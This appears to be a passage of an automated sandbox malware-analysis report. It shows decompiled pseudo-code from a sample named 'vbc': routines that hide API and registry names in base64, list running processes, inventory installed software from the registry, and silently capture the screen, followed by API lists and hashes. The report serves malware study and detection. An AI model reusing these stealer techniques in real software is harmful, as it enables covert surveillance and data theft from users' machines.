				void* _t245;
				void* _t247;
				intOrPtr _t248;

				_t239 = __esi;
				_t109 = __eax | 0x5500000a;
				_t246 = _t247;
				_t248 = _t247 + 0xfffffda0;
				_v612 = 0;
				_v608 = 0;
				_v604 = 0;
				_v596 = 0;
				_v600 = 0;
				_v592 = 0;
				_v588 = 0;
				_v8 = 0;
				_v24 = 0;
				_v16 = _t109;
				 *[fs:eax] = _t248;
				E00406984("Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90", __ebx,  &_v588, __edi, __esi);
				_t114 = E00403990(_v588);
				_t193 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t114);
				E00406984("UHJvY2VzczMyRmlyc3RX", _t193,  &_v592, __edi, __esi);
				_t120 = E00403990(_v592);
				_t236 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t120);
				E00406984("UHJvY2VzczMyTmV4dFc=", _t193,  &_v596, _t236, __esi);
				_t126 = E00403990(_v596);
				E00406984("a2VybmVsMzIuZGxs", _t193,  &_v600, _t236, _t239);
				_t240 = GetProcAddress(LoadLibraryA(E00403990(_v600)), _t126);
				E004034E4(_v16);
				_t194 =  *_t193(2, 0,  *[fs:eax], 0x416eca, _t247, __edi, __esi, __ebx, _t245);
				if(_t194 != 0xffffffff) {
					_v584 = 0x22c;
					_push( &_v584);
					_push(_t194);
					if( *_t236() != 0) {
						do {
							_push(E004045EC(_v8) + 1);
							E004047A8();
							_t184 = E004045EC(_v8);
							_t244 =  &_v584;
							memcpy(_v8 + _t184 * 0x8b * 4 - 0x22c, _t244, 0x8b << 2);
							_t248 = _t248 + 0x10;
							_t236 = _t244 + 0x116;
							_t240 = _t240;
							 *((intOrPtr*)(_v8 + E004045EC(_v8) * 0x8b * 4 - 0x20c)) = 0;
							_push( &_v584);
							_push(_t194);
						} while ( *_t240() != 0);
					}
					_t175 =  *0x41b57c; // 0x41c690
					 *((intOrPtr*)( *_t175))(_t194);
				}
				_t138 = E004045EC(_v8) - 1;
				if(_t138 >= 0) {
					_v28 = _t138 + 1;
					_t196 = 0;
					do {
						_v17 = 1;
						_t170 = E004045EC(_v8) - 1;
						if(_t170 >= 0) {
							_t172 = _t170 + 1;
							_t230 = 0;
							do {
								_t43 = _t196 * 0x8b * 4; // 0x0
								_t243 = _t230 * 0x8b;
								_t236 = _v8;
								_t47 = _t243 * 4; // 0x1ffff
								if( *((intOrPtr*)(_v8 + _t43 + 0x18)) ==  *((intOrPtr*)(_v8 + _t47 + 8))) {
									_v17 = 0;
								}
								_t230 = _t230 + 1;
								_t172 = _t172 - 1;
							} while (_t172 != 0);
						}
						_t171 = _t196 * 0x8b;
						_t52 = _t171 * 4; // 0x0
						_t56 = _t171 * 4; // 0x1ffff
						if( *((intOrPtr*)(_v8 + _t52 + 0x18)) ==  *((intOrPtr*)(_v8 + _t56 + 8))) {
							_v17 = 1;
						}
						if(_v17 == 1) {
							 *((intOrPtr*)(_v8 + 0x20 + _t171 * 4)) = 1;
						}
						_t196 = _t196 + 1;
						_t64 =  &_v28;
						 *_t64 = _v28 - 1;
					} while ( *_t64 != 0);
				}
				_v12 = GetCurrentProcessId();
				_t142 = E004045EC(_v8) - 1;
				if(_t142 >= 0) {
					_v28 = _t142 + 1;
					_t195 = 0;
					do {
						_t241 = _t195 * 0x8b;
						if( *((intOrPtr*)(_v8 + 0x20 + _t241 * 4)) == 1) {
							_t75 = _t241 * 4; // 0x1ffff
							if( *((intOrPtr*)(_v8 + _t75 + 8)) != _v12) {
								_push(_v24);
								_t90 = _t241 * 4; // 0x0
								E00403760( &_v608, 0x104, _v8 + _t90 + 0x24);
								_push(_v608);
								_push(E00416F84);
								E00403850();
							} else {
								_push(_v24);
								_t82 = _t241 * 4; // 0x0
								E00403760( &_v604, 0x104, _v8 + _t82 + 0x24);
								_push(_v604);
								_push(0x416f78);
								_push(E00416F84);
								E00403850();
							}
							_t96 = _t195 * 0x8b * 4; // 0x1ffff
							E004169F0( *((intOrPtr*)(_v8 + _t96 + 8)), _t195,  &_v612, 1, _t236, _t241, _t246);
							E00403798( &_v24, _v612);
						}
						E00403538(_v16, _v24);
						_t195 = _t195 + 1;
						_t103 =  &_v28;
						 *_t103 = _v28 - 1;
					} while ( *_t103 != 0);
				}
				_pop(_t215);
				 *[fs:eax] = _t215;
				_push(E00416ED1);
				E00403508( &_v612, 7);
				E004034E4( &_v24);
				_t217 =  *0x4169c8; // 0x4169cc
				return E004047B4( &_v8, _t217);
			}










































                                                                                                    0x00416b90
                                                                                                    0x00416b90
                                                                                                    0x00416b95
                                                                                                    0x00416b97
                                                                                                    0x00416ba2
                                                                                                    0x00416ba8
                                                                                                    0x00416bae
                                                                                                    0x00416bb4
                                                                                                    0x00416bba
                                                                                                    0x00416bc0
                                                                                                    0x00416bc6
                                                                                                    0x00416bcc
                                                                                                    0x00416bcf
                                                                                                    0x00416bd2
                                                                                                    0x00416be0
                                                                                                    0x00416bee
                                                                                                    0x00416bf9
                                                                                                    0x00416c0f
                                                                                                    0x00416c1c
                                                                                                    0x00416c27
                                                                                                    0x00416c3d
                                                                                                    0x00416c4a
                                                                                                    0x00416c55
                                                                                                    0x00416c66
                                                                                                    0x00416c82
                                                                                                    0x00416c87
                                                                                                    0x00416c92
                                                                                                    0x00416c97
                                                                                                    0x00416c9d
                                                                                                    0x00416cad
                                                                                                    0x00416cae
                                                                                                    0x00416cb3
                                                                                                    0x00416cb5
                                                                                                    0x00416cbe
                                                                                                    0x00416ccd
                                                                                                    0x00416cd8
                                                                                                    0x00416cee
                                                                                                    0x00416cf9
                                                                                                    0x00416cf9
                                                                                                    0x00416cf9
                                                                                                    0x00416cfb
                                                                                                    0x00416d0f
                                                                                                    0x00416d1c
                                                                                                    0x00416d1d
                                                                                                    0x00416d20
                                                                                                    0x00416cb5
                                                                                                    0x00416d25
                                                                                                    0x00416d2c
                                                                                                    0x00416d2c
                                                                                                    0x00416d36
                                                                                                    0x00416d39
                                                                                                    0x00416d3c
                                                                                                    0x00416d3f
                                                                                                    0x00416d41
                                                                                                    0x00416d41
                                                                                                    0x00416d4d
                                                                                                    0x00416d50
                                                                                                    0x00416d52
                                                                                                    0x00416d53
                                                                                                    0x00416d55
                                                                                                    0x00416d5e
                                                                                                    0x00416d62
                                                                                                    0x00416d68
                                                                                                    0x00416d6b
                                                                                                    0x00416d6f
                                                                                                    0x00416d71
                                                                                                    0x00416d71
                                                                                                    0x00416d75
                                                                                                    0x00416d76
                                                                                                    0x00416d76
                                                                                                    0x00416d55
                                                                                                    0x00416d79
                                                                                                    0x00416d82
                                                                                                    0x00416d89
                                                                                                    0x00416d8d
                                                                                                    0x00416d8f
                                                                                                    0x00416d8f
                                                                                                    0x00416d97
                                                                                                    0x00416d9c
                                                                                                    0x00416d9c
                                                                                                    0x00416da4
                                                                                                    0x00416da5
                                                                                                    0x00416da5
                                                                                                    0x00416da5
                                                                                                    0x00416d41
                                                                                                    0x00416daf
                                                                                                    0x00416dba
                                                                                                    0x00416dbd
                                                                                                    0x00416dc4
                                                                                                    0x00416dc7
                                                                                                    0x00416dc9
                                                                                                    0x00416dc9
                                                                                                    0x00416dd7
                                                                                                    0x00416de0
                                                                                                    0x00416de7
                                                                                                    0x00416e22
                                                                                                    0x00416e2e
                                                                                                    0x00416e37
                                                                                                    0x00416e3c
                                                                                                    0x00416e42
                                                                                                    0x00416e4f
                                                                                                    0x00416de9
                                                                                                    0x00416de9
                                                                                                    0x00416df5
                                                                                                    0x00416dfe
                                                                                                    0x00416e03
                                                                                                    0x00416e09
                                                                                                    0x00416e0e
                                                                                                    0x00416e1b
                                                                                                    0x00416e1b
                                                                                                    0x00416e5e
                                                                                                    0x00416e6d
                                                                                                    0x00416e7c
                                                                                                    0x00416e7c
                                                                                                    0x00416e87
                                                                                                    0x00416e8c
                                                                                                    0x00416e8d
                                                                                                    0x00416e8d
                                                                                                    0x00416e8d
                                                                                                    0x00416dc9
                                                                                                    0x00416e98
                                                                                                    0x00416e9b
                                                                                                    0x00416e9e
                                                                                                    0x00416eae
                                                                                                    0x00416eb6
                                                                                                    0x00416ebe
                                                                                                    0x00416ec9

                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00416C04
                                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?), ref: 00416C0A
                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00416C32
                                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001), ref: 00416C38
                                                                                                    • LoadLibraryA.KERNEL32(00000000), ref: 00416C77
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?), ref: 00416C7D
                                                                                                    • GetCurrentProcessId.KERNEL32(?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,,?,Zone: ,?,004175A8), ref: 00416DAA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressLibraryLoadProc$CurrentProcess
                                                                                                    • String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
                                                                                                    • API String ID: 3877065590-4127804628
                                                                                                    • Opcode ID: 23aed005d1cd924713a6c9523997cf456d4e38f9e5c7cc2fcb202ae1bcbd67cf
                                                                                                    • Instruction ID: fd76d8ed353255a1278cd755ee3df483ef4fe920b1e5afc451e9d1c12470fbd9
                                                                                                    • Opcode Fuzzy Hash: 23aed005d1cd924713a6c9523997cf456d4e38f9e5c7cc2fcb202ae1bcbd67cf
                                                                                                    • Instruction Fuzzy Hash: B2818570A006099BCB10EF69C985ADEB7B9FF84304F1181BAE509B7291D739DF858F58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00415F30 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 305registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 51%
                                                                                                    			E00415F30(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				void* _v8;
				char _v1009;
				char _v1016;
				intOrPtr _v1020;
				char _v1024;
				char _v1028;
				char _v1032;
				char _v1036;
				char _v1040;
				char _v1044;
				char _v1048;
				char _v1052;
				char _v1056;
				char _v1060;
				char _v1064;
				char _v1068;
				char _v1072;
				char _v1076;
				intOrPtr _v1080;
				char _v1084;
				char _v1088;
				char _v1092;
				char _v1096;
				char _v1100;
				char _v1104;
				char _v1108;
				char _v1112;
				char _v1116;
				char _v1120;
				char _v1124;
				char _v1128;
				char _v1132;
				char _v1136;
				char _v1140;
				char _v1144;
				char _v1148;
				void* _t123;
				void* _t144;
				void* _t178;
				void* _t199;
				intOrPtr* _t262;
				void* _t263;
				void* _t265;
				void* _t267;
				void* _t269;
				void* _t271;
				intOrPtr _t318;
				char* _t329;
				int _t331;
				int _t332;
				intOrPtr _t334;
				intOrPtr _t335;

				_t334 = _t335;
				_t263 = 0x8f;
				do {
					_push(0);
					_push(0);
					_t263 = _t263 - 1;
				} while (_t263 != 0);
				_t262 = __eax;
				_t329 =  &_v1009;
				_push(_t334);
				_push(0x416452);
				_push( *[fs:eax]);
				 *[fs:eax] = _t335;
				E004034E4(__eax);
				_t331 = 0;
				E00406984("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs", _t262,  &_v1016, _t329, 0);
				RegOpenKeyExA(0x80000002, E00403990(_v1016), 0, 0x20019,  &_v8);
				while(RegEnumKeyA(_v8, _t331, _t329, 0x3e9) == 0) {
					E00403D2C( &_v1024,  *_t262);
					_push(_v1024);
					_push(0);
					_push( &_v1028);
					E00406984("RGlzcGxheU5hbWU=", _t262,  &_v1036, _t329, _t331);
					E00403C98( &_v1032, E00403990(_v1036));
					_push(_v1032);
					E00406984("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==", _t262,  &_v1044, _t329, _t331);
					_push( &_v1044);
					E00403748( &_v1048, 0x3e9, _t329);
					_pop(_t123);
					E00403798(_t123, _v1048);
					E00403C98( &_v1040, E00403990(_v1044));
					_pop(_t265);
					E00407500(0x80000002, _t262, _t265, _v1040);
					_push(_v1028);
					_push(0x416528);
					_push(0);
					_push( &_v1052);
					E00406984("RGlzcGxheVZlcnNpb24=", _t262,  &_v1060, _t329, _t331);
					E00403C98( &_v1056, E00403990(_v1060));
					_push(_v1056);
					E00406984("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==", _t262,  &_v1068, _t329, _t331);
					_push( &_v1068);
					E00403748( &_v1072, 0x3e9, _t329);
					_pop(_t144);
					E00403798(_t144, _v1072);
					E00403C98( &_v1064, E00403990(_v1068));
					_pop(_t267);
					E00407500(0x80000002, _t262, _t267, _v1064);
					_push(_v1052);
					_push(")");
					E00403E1C();
					E0040377C(_t262, _v1020);
					_t331 = _t331 + 1;
				}
				_t332 = 0;
				E00406984("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs", _t262,  &_v1076, _t329, 0);
				RegOpenKeyExA(0x80000001, E00403990(_v1076), 0, 0x20019,  &_v8);
				while(RegEnumKeyA(_v8, _t332, _t329, 0x3e9) == 0) {
					E00403D2C( &_v1084,  *_t262);
					_push(_v1084);
					_push(0);
					_push( &_v1088);
					E00406984("RGlzcGxheU5hbWU=", _t262,  &_v1096, _t329, _t332);
					E00403C98( &_v1092, E00403990(_v1096));
					_push(_v1092);
					E00406984("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==", _t262,  &_v1104, _t329, _t332);
					_push( &_v1104);
					E00403748( &_v1108, 0x3e9, _t329);
					_pop(_t178);
					E00403798(_t178, _v1108);
					E00403C98( &_v1100, E00403990(_v1104));
					_pop(_t269);
					E00407500(0x80000001, _t262, _t269, _v1100);
					_push(_v1088);
					_push(0x416528);
					_push(0);
					_push( &_v1112);
					E00406984("RGlzcGxheVZlcnNpb24=", _t262,  &_v1120, _t329, _t332);
					E00403C98( &_v1116, E00403990(_v1120));
					_push(_v1116);
					E00406984("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==", _t262,  &_v1128, _t329, _t332);
					_push( &_v1128);
					E00403748( &_v1132, 0x3e9, _t329);
					_pop(_t199);
					E00403798(_t199, _v1132);
					E00403C98( &_v1124, E00403990(_v1128));
					_pop(_t271);
					E00407500(0x80000001, _t262, _t271, _v1124);
					_push(_v1112);
					_push(")");
					E00403E1C();
					E0040377C(_t262, _v1080);
					_t332 = _t332 + 1;
				}
				E00403D2C( &_v1140,  *_t262);
				E004070BC(_v1140, _t262, 0x41655c, L"()\r\n",  &_v1136);
				E0040377C(_t262, _v1136);
				E00403D2C( &_v1148,  *_t262);
				E004070BC(_v1148, _t262, 0x41655c, L"\r\n\r\n",  &_v1144);
				E0040377C(_t262, _v1144);
				_pop(_t318);
				 *[fs:eax] = _t318;
				_push(E0041645C);
				E00403B98( &_v1148, 4);
				E00403508( &_v1132, 2);
				E00403B80( &_v1124);
				E004034E4( &_v1120);
				E00403B98( &_v1116, 2);
				E00403508( &_v1108, 2);
				E00403B80( &_v1100);
				E004034E4( &_v1096);
				E00403B98( &_v1092, 4);
				E00403508( &_v1076, 3);
				E00403B80( &_v1064);
				E004034E4( &_v1060);
				E00403B98( &_v1056, 2);
				E00403508( &_v1048, 2);
				E00403B80( &_v1040);
				E004034E4( &_v1036);
				E00403B98( &_v1032, 4);
				return E004034E4( &_v1016);
			}























































                                                                                                    0x00415f31
                                                                                                    0x00415f33
                                                                                                    0x00415f38
                                                                                                    0x00415f38
                                                                                                    0x00415f3a
                                                                                                    0x00415f3c
                                                                                                    0x00415f3c
                                                                                                    0x00415f42
                                                                                                    0x00415f44
                                                                                                    0x00415f4c
                                                                                                    0x00415f4d
                                                                                                    0x00415f52
                                                                                                    0x00415f55
                                                                                                    0x00415f5a
                                                                                                    0x00415f5f
                                                                                                    0x00415f77
                                                                                                    0x00415f8d
                                                                                                    0x0041610a
                                                                                                    0x00415f9f
                                                                                                    0x00415fa4
                                                                                                    0x00415faa
                                                                                                    0x00415fb2
                                                                                                    0x00415fbe
                                                                                                    0x00415fd6
                                                                                                    0x00415fe1
                                                                                                    0x00415fed
                                                                                                    0x00415ff8
                                                                                                    0x00416006
                                                                                                    0x00416011
                                                                                                    0x00416012
                                                                                                    0x0041602a
                                                                                                    0x0041603a
                                                                                                    0x0041603b
                                                                                                    0x00416040
                                                                                                    0x00416046
                                                                                                    0x0041604b
                                                                                                    0x00416053
                                                                                                    0x0041605f
                                                                                                    0x00416077
                                                                                                    0x00416082
                                                                                                    0x0041608e
                                                                                                    0x00416099
                                                                                                    0x004160a7
                                                                                                    0x004160b2
                                                                                                    0x004160b3
                                                                                                    0x004160cb
                                                                                                    0x004160db
                                                                                                    0x004160dc
                                                                                                    0x004160e1
                                                                                                    0x004160e7
                                                                                                    0x004160f7
                                                                                                    0x00416104
                                                                                                    0x00416109
                                                                                                    0x00416109
                                                                                                    0x00416122
                                                                                                    0x0041613a
                                                                                                    0x00416150
                                                                                                    0x004162cd
                                                                                                    0x00416162
                                                                                                    0x00416167
                                                                                                    0x0041616d
                                                                                                    0x00416175
                                                                                                    0x00416181
                                                                                                    0x00416199
                                                                                                    0x004161a4
                                                                                                    0x004161b0
                                                                                                    0x004161bb
                                                                                                    0x004161c9
                                                                                                    0x004161d4
                                                                                                    0x004161d5
                                                                                                    0x004161ed
                                                                                                    0x004161fd
                                                                                                    0x004161fe
                                                                                                    0x00416203
                                                                                                    0x00416209
                                                                                                    0x0041620e
                                                                                                    0x00416216
                                                                                                    0x00416222
                                                                                                    0x0041623a
                                                                                                    0x00416245
                                                                                                    0x00416251
                                                                                                    0x0041625c
                                                                                                    0x0041626a
                                                                                                    0x00416275
                                                                                                    0x00416276
                                                                                                    0x0041628e
                                                                                                    0x0041629e
                                                                                                    0x0041629f
                                                                                                    0x004162a4
                                                                                                    0x004162aa
                                                                                                    0x004162ba
                                                                                                    0x004162c7
                                                                                                    0x004162cc
                                                                                                    0x004162cc
                                                                                                    0x004162f4
                                                                                                    0x00416309
                                                                                                    0x00416316
                                                                                                    0x0041632a
                                                                                                    0x0041633f
                                                                                                    0x0041634c
                                                                                                    0x00416353
                                                                                                    0x00416356
                                                                                                    0x00416359
                                                                                                    0x00416369
                                                                                                    0x00416379
                                                                                                    0x00416384
                                                                                                    0x0041638f
                                                                                                    0x0041639f
                                                                                                    0x004163af
                                                                                                    0x004163ba
                                                                                                    0x004163c5
                                                                                                    0x004163d5
                                                                                                    0x004163e5
                                                                                                    0x004163f0
                                                                                                    0x004163fb
                                                                                                    0x0041640b
                                                                                                    0x0041641b
                                                                                                    0x00416426
                                                                                                    0x00416431
                                                                                                    0x00416441
                                                                                                    0x00416451

                                                                                                    APIs
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E), ref: 00415F8D
                                                                                                    • RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E), ref: 00416150
                                                                                                    • RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8
                                                                                                      • Part of subcall function 00407500: RegQueryValueExW.KERNEL32(?,00000000,00000000,00000001,00000000,000000FE), ref: 004075A9
                                                                                                      • Part of subcall function 00407500: RegCloseKey.KERNEL32(80000002), ref: 004075C6
                                                                                                      • Part of subcall function 00407500: RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,?), ref: 00407582
                                                                                                      • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                                                                                                      • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Open$EnumFreeString$CloseQueryValue
                                                                                                    • String ID: $()$)$RGlzcGxheU5hbWU=$RGlzcGxheVZlcnNpb24=$U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs$U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==
                                                                                                    • API String ID: 3137145628-3013244427
                                                                                                    • Opcode ID: de493516d1551eb8ed3128fa62d2f5255a1c7b72798445e0c46a5ea88ad76063
                                                                                                    • Instruction ID: 33798bc805095534a257e2f05040e6cfe59ff7211d39a9aa4329e2c1f04a858c
                                                                                                    • Opcode Fuzzy Hash: de493516d1551eb8ed3128fa62d2f5255a1c7b72798445e0c46a5ea88ad76063
                                                                                                    • Instruction Fuzzy Hash: 34C124B1A001189BD710EB55CC81BCEB7BDAF44309F5145FBA608B7286DA38AF858F5D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004178B4 Relevance: 18.2, APIs: 12, Instructions: 162windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 30%
                                                                                                    			E004178B4(int __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, char _a12, int _a16) {
				int _v8;
				int _v12;
				int _v16;
				char _v20;
				char _v24;
				char _v28;
				void* _v32;
				struct HWND__* _v48;
				struct HWND__* _v52;
				struct HWND__* _v56;
				char _v60;
				intOrPtr _v124;
				char _v132;
				char _v148;
				char* _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				void* _v176;
				char _v180;
				intOrPtr* _t78;
				struct HDC__* _t100;
				intOrPtr _t107;
				void* _t112;
				void* _t114;
				struct HDC__* _t116;
				struct HDC__* _t118;
				void* _t121;

				_v28 = 0;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_push(_t121);
				_push(0x417adb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t121 + 0xffffff50;
				if( *0x41c868 != 0 &&  *0x41c86c != 0 &&  *0x41c870 != 0 &&  *0x41c874 != 0 &&  *0x41c878 != 0 &&  *0x41c87c != 0 &&  *0x41c880 != 0 &&  *0x41c884 != 0 &&  *0x41c888 != 0 &&  *0x41c88c != 0) {
					_v60 = 1;
					_v56 = 0;
					_v52 = 0;
					_v48 = 0;
					_push(0);
					_push( &_v60);
					_push( &_v20);
					if( *0x41c86c() == 0) {
						_t100 = GetDC(0);
						_t116 = CreateCompatibleDC(0);
						_t112 = CreateCompatibleBitmap(_t100, _v8, _v12);
						SelectObject(_t116, _t112);
						BitBlt(_t116, 0, 0, _v8, _v12, _t100, _v16, _a16, 0xcc0020);
						 *0x41c888(0, 0xffffffff, E00404900( &_v28));
						 *0x41c874(_t112, 0,  &_v24);
						E004177E0(_a8, _t100,  &_v148, _t112, _t116);
						_v180 = 1;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t114 = _t112;
						_t118 = _t116;
						_v160 = 1;
						_v156 = 4;
						_v152 =  &_a12;
						 *0x41c884(_v24, _v28,  &_v148,  &_v180);
						_t78 = _v28;
						 *((intOrPtr*)( *_t78 + 0x30))(_t78,  &_v132, 1);
						 *0x41c88c(_v28,  &_v32);
						GlobalFix(_v32);
						E004035D4(_a4, _v124, _v32);
						 *0x41c880(_v24);
						GlobalUnWire(_v32);
						DeleteObject(_t114);
						DeleteDC(_t118);
						ReleaseDC(0, _t100);
						 *0x41c870(_v20);
					}
				}
				_pop(_t107);
				 *[fs:eax] = _t107;
				_push(E00417AE2);
				return E00404900( &_v28);
			}






























                                                                                                    0x004178c2
                                                                                                    0x004178c5
                                                                                                    0x004178c8
                                                                                                    0x004178cb
                                                                                                    0x004178d0
                                                                                                    0x004178d1
                                                                                                    0x004178d6
                                                                                                    0x004178d9
                                                                                                    0x004178e3
                                                                                                    0x0041795e
                                                                                                    0x00417965
                                                                                                    0x0041796c
                                                                                                    0x00417973
                                                                                                    0x0041797a
                                                                                                    0x0041797f
                                                                                                    0x00417983
                                                                                                    0x0041798c
                                                                                                    0x00417999
                                                                                                    0x004179a2
                                                                                                    0x004179b2
                                                                                                    0x004179b6
                                                                                                    0x004179d6
                                                                                                    0x004179e8
                                                                                                    0x004179f5
                                                                                                    0x00417a04
                                                                                                    0x00417a09
                                                                                                    0x00417a20
                                                                                                    0x00417a21
                                                                                                    0x00417a22
                                                                                                    0x00417a23
                                                                                                    0x00417a24
                                                                                                    0x00417a25
                                                                                                    0x00417a26
                                                                                                    0x00417a30
                                                                                                    0x00417a3d
                                                                                                    0x00417a59
                                                                                                    0x00417a65
                                                                                                    0x00417a6b
                                                                                                    0x00417a76
                                                                                                    0x00417a80
                                                                                                    0x00417a8f
                                                                                                    0x00417a98
                                                                                                    0x00417aa2
                                                                                                    0x00417aa8
                                                                                                    0x00417aae
                                                                                                    0x00417ab6
                                                                                                    0x00417abf
                                                                                                    0x00417abf
                                                                                                    0x0041798c
                                                                                                    0x00417ac7
                                                                                                    0x00417aca
                                                                                                    0x00417acd
                                                                                                    0x00417ada

                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 00417994
                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 0041799D
                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,0041A69E,?), ref: 004179AD
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 004179B6
                                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,0041A69E,?,00000000,00000000,?,00CC0020), ref: 004179D6
                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,000000FF,00000000), ref: 004179E8
                                                                                                    • GetHGlobalFromStream.OLE32(?,?), ref: 00417A76
                                                                                                    • GlobalFix.KERNEL32(?), ref: 00417A80
                                                                                                    • GlobalUnWire.KERNEL32(?), ref: 00417AA2
                                                                                                    • DeleteObject.GDI32(00000000), ref: 00417AA8
                                                                                                    • DeleteDC.GDI32(00000000), ref: 00417AAE
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00417AB6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Global$Create$CompatibleDeleteObjectStream$BitmapFromReleaseSelectWire
                                                                                                    • String ID:
                                                                                                    • API String ID: 2310682421-0
                                                                                                    • Opcode ID: c6339665ace03b91d436a6d8c1ab4105ac859371922734f0929d45322917c03e
                                                                                                    • Instruction ID: 9ea5443061d6a736e16c7905b4946b830ee6406ef7c7b01cecb07d86951751fb
                                                                                                    • Opcode Fuzzy Hash: c6339665ace03b91d436a6d8c1ab4105ac859371922734f0929d45322917c03e
                                                                                                    • Instruction Fuzzy Hash: 9B513CB1944208AFDB10EFA5DC85BEF7BF8AB48305F24402AF614E62D1D7789985CB58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00401934 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 62COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 71%
                                                                                                    			E00401934() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t19;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t28;

				_t26 = _t28;
				if( *0x41c5ac == 0) {
					return _t2;
				} else {
					_push(_t26);
					_push(E00401A0A);
					_push( *[fs:edx]);
					 *[fs:edx] = _t28;
					if( *0x41c035 != 0) {
						_push("(.M");
						L004011CC();
					}
					 *0x41c5ac = 0;
					_t3 =  *0x41c60c; // 0x4d4a48
					LocalFree(_t3);
					 *0x41c60c = 0;
					_t19 =  *0x41c5d4; // 0x4d5f9c
					while(_t19 != 0x41c5d4) {
						VirtualFree( *(_t19 + 8), 0, 0x8000);
						_t19 =  *_t19;
					}
					E00401234(0x41c5d4);
					E00401234(0x41c5e4);
					E00401234(0x41c610);
					_t14 =  *0x41c5cc; // 0x4d5a48
					while(_t14 != 0) {
						 *0x41c5cc =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x41c5cc; // 0x4d5a48
					}
					_pop(_t23);
					 *[fs:eax] = _t23;
					_push(0x401a11);
					if( *0x41c035 != 0) {
						_push("(.M");
						L004011D4();
					}
					_push("(.M");
					L004011DC();
					return 0;
				}
			}










